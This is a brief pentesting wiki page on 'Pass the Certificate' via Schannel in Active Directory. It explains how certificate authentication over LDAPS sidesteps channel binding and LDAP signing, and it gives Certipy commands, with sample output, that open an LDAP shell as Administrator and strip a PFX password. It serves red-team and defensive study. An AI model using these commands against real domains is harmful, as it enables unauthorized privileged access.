Infiltr8ForumGitHub

Pass the Certificate - Schannel

Theory

In cases where a Domain Controller does not support PKINIT, you may encounter the KDC_ERR_PADATA_TYPE_NOSUPP error when trying to authenticate. For a KDC to support PKINIT, its certificates must include the Smart Card Logon EKU.

Fortunately, we can still use Schannel SSP (Security Service Provider) to authenticate ourselves using a certificate. Schanel is the SSL/TLS implementation from Microsoft in Windows and can be used to authenticate servers and clients and then use the protocol to encrypt messages between the authenticated parties. Several protocols including LDAP support it.

  • Schannel authentication relies on TLS so it is, by design, not subject to channel binding, as the authentication is borne by TLS itself.

  • Schannel is not subject to LDAP signing either as the bind is performed after a StartTLS command when used on the LDAP TCP port.

Practice

Authentication via Schannel is supported by Certipy. lt will open a connection to LDAPS and drop into an interactive shell with limited LDAP commands

certipy auth -pfx <PATH_TO_PFX_CERT> -username <user> -domain <DOMAIN_FQDN> -ldap-shell -ldap-scheme ldaps -dc-ip $DC_IP
[*] Connecting to 'ldaps://10.10.10.10:636'
[*] Authenticated to '10.10.10.10' as: u:CONTOSO.LOCAL\Administrator
Type help for list of commands

# help

Notes that Certipy's commands don't support PFXs with password. The following command can be used to "unprotect" a PFX file.

certipy cert -export -pfx <PATH_TO_PFX_CERT> -password <CERT_PASSWORD> -out <unprotected.pfx>

Resources

Last updated